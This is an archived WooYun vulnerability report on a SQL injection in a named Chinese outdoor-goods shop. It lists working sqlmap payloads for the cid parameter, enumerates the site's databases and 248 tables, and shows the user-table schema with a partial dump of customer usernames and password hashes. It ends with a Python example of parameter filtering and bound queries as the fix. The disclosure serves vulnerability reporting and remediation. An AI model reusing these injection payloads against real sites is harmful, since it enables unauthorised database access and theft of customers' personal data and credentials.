WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2016-01-11: Details reported to the vendor, awaiting vendor handling
2016-01-15: Vendor confirmed; details disclosed to the vendor only
2016-01-25: Details disclosed to core white hats and domain experts
2016-02-04: Details disclosed to regular white hats
2016-02-07: (no change) 
2016-02-14: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
The Auzzie Outdoors online shop (http://www.auzzieoutdoors.cn/index.html) has a SQL injection that leaks user data (26,797 records). The leaked user credentials allow logging in, and the administrator account details can also be extracted through the same injection.
1. Injection point:
http://**.**.**.**/brands/oe/category?cid=287
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=287) AND 7546=7546 AND (4466=4466

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cid=287) AND (SELECT 1891 FROM(SELECT COUNT(*),CONCAT(0x7176717671,(SELECT (ELT(1891=1891,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1509=1509

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cid=287) AND (SELECT * FROM (SELECT(SLEEP(5)))DGIb) AND (7616=7616

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cid=287) UNION ALL SELECT NULL,CONCAT(0x7176717671,0x706a43554b747a704c74,0x71787a7671),NULL,NULL,NULL--
---
[09:41:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
2. All databases:
available databases [2]:
[*] information_schema
[*] **.**.**.**
3. Tables in the **.**.**.** database:
Database: **.**.**.**
[248 tables]
aodao_account_log
aodao_ad
aodao_ad_custom
aodao_ad_position
aodao_admin_action
aodao_admin_log
aodao_admin_message
aodao_admin_user
aodao_adsense
aodao_advice
aodao_affiliate_log
aodao_agency
aodao_area_region
aodao_article
aodao_article_cat
aodao_attribute
aodao_attribute_sorting
aodao_auction_log
aodao_auto_manage
aodao_back_goods
aodao_back_order
aodao_bonus_type
aodao_booking_goods
aodao_brand
aodao_brand_banner
aodao_brand_cat_goods
aodao_brand_nav
aodao_card
aodao_cart
aodao_cat_goods_order
aodao_cat_recommend
aodao_category
aodao_collect_goods
aodao_comment
aodao_crons
aodao_delivery_goods
aodao_delivery_order
aodao_email_list
aodao_email_sendlist
aodao_error_log
aodao_exchange_goods
aodao_favourable_activity
aodao_feedback
aodao_friend_link
aodao_goods
aodao_goods_activity
aodao_goods_article
aodao_goods_attr
aodao_goods_cat
aodao_goods_gallery
aodao_goods_type
aodao_group_goods
aodao_keywords
aodao_link_goods
aodao_mail_templates
aodao_media
aodao_member_price
aodao_nav
aodao_oms_inventorystock
aodao_oms_log
aodao_order_action
aodao_order_goods
aodao_order_info
aodao_pack
aodao_package_goods
aodao_pay_log
aodao_pay_points
aodao_payment
aodao_photo
aodao_photo_like
aodao_photo_review
aodao_plugins
aodao_products
aodao_promote
aodao_promote_order
aodao_promote_pic
aodao_reg_extend_info
aodao_reg_fields
aodao_region
aodao_region_bak2
aodao_role
aodao_searchengine
aodao_series
aodao_sessions
aodao_sessions_data
aodao_shipping
aodao_shipping_area
aodao_shop_config
aodao_snatch_log
aodao_stats
aodao_suppliers
aodao_syncoms_order
aodao_tag
aodao_template
aodao_topic
aodao_user_account
aodao_user_address
aodao_user_bonus
aodao_user_bonus_log
aodao_user_feed
aodao_user_rank
aodao_users
aodao_virtual_card
aodao_volume_price
aodao_vote
aodao_vote_log
aodao_vote_option
aodao_wholesale
blogaodao_blog_versions
blogaodao_blogs
blogaodao_commentmeta
blogaodao_comments
blogaodao_huge_itportfolio_images
blogaodao_huge_itportfolio_portfolios
blogaodao_links
blogaodao_nextend_smartslider_layouts
blogaodao_nextend_smartslider_sliders
blogaodao_nextend_smartslider_slides
blogaodao_nextend_smartslider_storage
blogaodao_options
blogaodao_postmeta
blogaodao_posts
blogaodao_registration_log
blogaodao_signups
blogaodao_site
blogaodao_sitemeta
blogaodao_term_relationships
blogaodao_term_taxonomy
blogaodao_terms
blogaodao_usermeta
blogaodao_users
blogaodao_visitor_maps_ge
blogaodao_visitor_maps_st
blogaodao_visitor_maps_wo
blogaodao_wysija_campaign
blogaodao_wysija_campaign_list
blogaodao_wysija_custom_field
blogaodao_wysija_email
blogaodao_wysija_email_user_stat
blogaodao_wysija_email_user_url
blogaodao_wysija_form
blogaodao_wysija_list
blogaodao_wysija_queue
blogaodao_wysija_url
blogaodao_wysija_url_mail
blogaodao_wysija_user
blogaodao_wysija_user_field
blogaodao_wysija_user_history
blogaodao_wysija_user_list
ecs_account_log
ecs_ad
ecs_ad_custom
ecs_ad_position
ecs_admin_action
ecs_admin_log
ecs_admin_message
ecs_admin_user
ecs_adsense
ecs_affiliate_log
ecs_agency
ecs_area_region
ecs_article
ecs_article_cat
ecs_attribute
ecs_auction_log
ecs_auto_manage
ecs_back_goods
ecs_back_order
ecs_bonus_type
ecs_booking_goods
ecs_brand
ecs_card
ecs_cart
ecs_cat_recommend
ecs_category
ecs_collect_goods
ecs_comment
ecs_crons
ecs_delivery_goods
ecs_delivery_order
ecs_email_list
ecs_email_sendlist
ecs_error_log
ecs_exchange_goods
ecs_favourable_activity
ecs_feedback
ecs_friend_link
ecs_goods
ecs_goods_activity
ecs_goods_article
ecs_goods_attr
ecs_goods_cat
ecs_goods_gallery
ecs_goods_type
ecs_group_goods
ecs_keywords
ecs_link_goods
ecs_mail_templates
ecs_member_price
ecs_nav
ecs_order_action
ecs_order_goods
ecs_order_info
ecs_pack
ecs_package_goods
ecs_pay_log
ecs_payment
ecs_plugins
ecs_products
ecs_reg_extend_info
ecs_reg_fields
ecs_region
ecs_role
ecs_searchengine
ecs_sessions
ecs_sessions_data
ecs_shipping
ecs_shipping_area
ecs_shop_config
ecs_snatch_log
ecs_stats
ecs_suppliers
ecs_tag
ecs_template
ecs_topic
ecs_user_account
ecs_user_address
ecs_user_bonus
ecs_user_feed
ecs_user_rank
ecs_users
ecs_virtual_card
ecs_volume_price
ecs_vote
ecs_vote_log
ecs_vote_option
ecs_wholesale
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
4. Columns of the user table aodao_users:
Database: **.**.**.**
Table: aodao_users
[38 columns]
+-----------------+------------------------+
| Column          | Type                   |
+-----------------+------------------------+
| address_id      | mediumint(8) unsigned  |
| aite_id         | text                   |
| alias           | varchar(60)            |
| answer          | varchar(255)           |
| birthday        | date                   |
| credit_line     | decimal(10,2) unsigned |
| ec_salt         | varchar(10)            |
| email           | varchar(60)            |
| flag            | tinyint(3) unsigned    |
| frozen_money    | decimal(10,2)          |
| home_phone      | varchar(20)            |
| is_special      | tinyint(3) unsigned    |
| is_validated    | tinyint(3) unsigned    |
| last_ip         | varchar(15)            |
| last_login      | int(11) unsigned       |
| last_time       | datetime               |
| ltinfo          | varchar(255)           |
| mobile_phone    | varchar(20)            |
| msn             | varchar(60)            |
| office_phone    | varchar(20)            |
| openid          | varchar(32)            |
| parent_id       | mediumint(9)           |
| passwd_answer   | varchar(255)           |
| passwd_question | varchar(50)            |
| password        | varchar(32)            |
| pay_points      | int(10) unsigned       |
| qq              | varchar(20)            |
| question        | varchar(255)           |
| rank_points     | int(10) unsigned       |
| reg_source      | varchar(32)            |
| reg_time        | int(10) unsigned       |
| salt            | varchar(10)            |
| sex             | tinyint(1) unsigned    |
| user_id         | mediumint(8) unsigned  |
| user_money      | decimal(10,2)          |
| user_name       | varchar(60)            |
| user_rank       | tinyint(3) unsigned    |
| visit_count     | smallint(5) unsigned   |
+-----------------+------------------------+
5. Data in the user_name, password, mobile_phone, email and sex columns (partial):
Database: **.**.**.**
Table: aodao_users
[26797 entries]
[08:46:17] [WARNING] console output will be trimmed to last 256 rows due to large table size
| user_name | password | mobile_phone | email | sex | birthday |
| F3A23D150C2156B4475F756F54A3197A@**.**.**.** | 69b0a928cd722a6b3e42a9a3c0334054 | <blank> | <blank> | 0 | 0000-00-00 |
| 9A5A195077D30DB6E8FBFDF696027DCC@**.**.**.** | 575c4facfd099cd9dcfc35d416c9cca3 | <blank> | <blank> | 0 | 0000-00-00 |
| 56251E60C71A463BEADE55D899E4EB90@**.**.**.** | 186df3259b54743f12f2f179f81fd493 | <blank> | <blank> | 0 | 0000-00-00 |
| 8764169D4D854038A4A9CADE8B36A1E4@**.**.**.** | dfec10e9a881c372715a09ee071ce0a1 | <blank> | <blank> | 0 | 0000-00-00 |
| 2AE0604195C08F80B92EF051087FA246@**.**.**.** | be3c8967b7b434b42e5e63e82bf2c94f | <blank> | <blank> | 0 | 0000-00-00 |
| BA7D878154C5D5EF514CB8709A0F6B1B@**.**.**.** | f40dc51fe6646ffe3bd14061c6c73d42 | <blank> | <blank> | 0 | 0000-00-00 |
| 01FE08BD834B6B96C84FEACA8170D12C@**.**.**.** | 3a10405dc50978f45b1a6ab681624591 | <blank> | <blank> | 0 | 0000-00-00 |
| 4F4EA3D2F2BFE9CD24C4A2D049D17F42@**.**.**.** | bee66989db78c2e8871ca4df7649b278 | <blank> | <blank> | 0 | 0000-00-00 |
| 7D7BB307CE0DC3AE3126CDBA3520C545@**.**.**.** | 37d639646aa49b03df1009a79dd65683 | <blank> | <blank> | 0 | 0000-00-00 |
| 04819E2610335787FD458D89F05005A7@**.**.**.** | 433a654e6e4f773ec2eefcce7d1fe0d8 | <blank> | <blank> | 0 | 0000-00-00 |
| 505065ADBBEDE5C50CB3D11608A63504@**.**.**.** | d7fd50965380c0daa2b3714589eea677 | <blank> | <blank> | 0 | 0000-00-00 |
| 0BD6D86E2382BABB2C687CC72E764C0D@**.**.**.** | 5ed2c4ad1bfd3f24d6d98f020cb2282f | <blank> | <blank> | 0 | 0000-00-00 |
| 5EC8C8261FC1B90C376ADB7FC3B705E4@**.**.**.** | 339024fd1a43a5d27e8601a43447081c | <blank> | <blank> | 0 | 0000-00-00 |
| 94FF225E7C42F58A6FB0E744EA7B543A@**.**.**.** | 25bdb072beb0ac49c403bd2d358a8d48 | <blank> | <blank> | 0 | 0000-00-00 |
| 46CABB8DFBC7E80E7D525EDD7CE00B09@**.**.**.** | 9d945f8152345588ed56032039974152
6. Log in as an arbitrary user:
7. Administrator account information:
8. The passwords could not be cracked.
Parameter filtering.
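What "parameter filtering" means for the cid parameter of the /brands/oe/category endpoint, as an added example that is not part of the report and not the site's code: the site runs PHP/MySQL, but the pattern is shown here in Python against an in-memory SQLite database so it runs stand-alone. The category table, its columns and the shape of the query are assumptions; the only payload used is the boolean-based one sqlmap reported above.

```python
import re
import sqlite3

# Constructed stand-in for the site's category table (assumed schema).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE category (cid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO category VALUES (?, ?)",
        [(286, "Tents"), (287, "Sleeping bags"), (288, "Stoves")],
    )
    return conn

# The boolean-based blind payload exactly as sqlmap reported it for this endpoint.
PAGE_PAYLOAD = "287) AND 7546=7546 AND (4466=4466"


def vulnerable_lookup(conn: sqlite3.Connection, cid: str) -> list:
    # Assumed vulnerable shape: the raw ?cid= value is pasted into the SQL text,
    # so the trailing ") AND ... AND (" in the payload is parsed as SQL, not data.
    sql = "SELECT cid, name FROM category WHERE (cid = %s)" % cid
    return conn.execute(sql).fetchall()


def filter_cid(raw: str) -> int:
    # Parameter filtering: a category id is a plain positive integer and nothing
    # else. Anything containing spaces, parentheses or keywords is rejected
    # before it can reach the database. (PHP equivalent: intval() plus a check.)
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("cid must be a positive integer")
    return int(raw)


def safe_lookup(conn: sqlite3.Connection, cid: str) -> list:
    # Validate, then bind as a parameter: the SQL text never changes with input.
    cid_int = filter_cid(cid)
    return conn.execute(
        "SELECT cid, name FROM category WHERE cid = ?", (cid_int,)
    ).fetchall()


def demo() -> dict:
    conn = make_db()
    # The injected clause executes as SQL in the vulnerable version.
    vulnerable_rows = vulnerable_lookup(conn, PAGE_PAYLOAD)
    # The filtered version refuses the same input outright.
    try:
        safe_lookup(conn, PAGE_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "vulnerable_rows": vulnerable_rows,
        "payload_blocked": blocked,
        "normal_rows": safe_lookup(conn, "287"),
    }


if __name__ == "__main__":
    print(demo())
```

The validated integer is still passed as a bound parameter rather than re-concatenated: the whitelist stops this class of input, and parameter binding keeps the query safe for every other column the same code base builds queries for. In PHP the same two steps are `intval()` (or a regex check) on `$_GET['cid']` followed by a prepared statement via PDO or mysqli.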
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2016-01-15 15:33
CNVD did not directly reproduce the described issue; CNVD has notified the website's operating organization through the site's publicly listed contact details.
None.